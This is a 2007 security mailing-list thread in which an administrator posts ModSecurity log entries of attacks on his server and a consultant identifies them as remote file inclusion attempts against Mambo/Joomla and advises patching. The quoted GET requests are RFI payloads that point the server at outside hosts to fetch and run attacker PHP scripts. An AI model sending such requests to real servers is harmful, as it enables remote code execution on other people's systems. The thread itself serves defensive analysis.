Home page logo
/

basics logo Security Basics mailing list archives

Re: PHP web exploit/vulnerability
From: Danux <danuxx () gmail com>
Date: Tue, 23 Oct 2007 12:31:07 -0500

First of all, that kind of attacks are trying to exploit a Content
Management Software called "Mambo" or maybe Joomla (Next Generation),
so, if you have this sw installed on you server you should check if
you have the required patches!! if you dont have this sw... then they
are all false positives.

But you should check also if your PHP apps are not vulnerable to this
kind of attacks:
I mean... Remote File Inclusion, so on.

Cheers!!!!

On 10/23/07, Camilo Olea <colea () sunset com mx> wrote:
Hello everyone,

I'm sorry if this is a stupid question, but I just wanted your input,
maybe direct me to some links, another mail list, or whatever you might
add would be highly appreciated; we have modsecurity installed on our
server, and it has been logging many attacks like the following:

GET
/content/multithumb/class.img2thumb.inc?mosConfig_absolute_path=http://beach.tsv-detti
\
ngen.de/admin/ec.txt? HTTP/1.1

GET
/index.php?option=com_%3Cwbr%20//mambots/*.php?mosConfig_absolute_path=uid=48(apache)%
\
20gid=48(apache)%20groups=48(apache)%0A? HTTP/1.1

GET /index.php?option=http://0x0134.lan.io/pb.php? HTTP/1.1

I managed to get a copy of the php script which these attacks try to
force the server to execute, I could post it here if that is correct and
anybody could take a look at it and help me out a little to understand
what it's trying to do.

Any help is appreciated, thanks in advance.

Camilo Olea






-- 
Danux, CISSP
Chief Information Security Officer
Macula Security Consulting Group
www.macula-group.com


  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]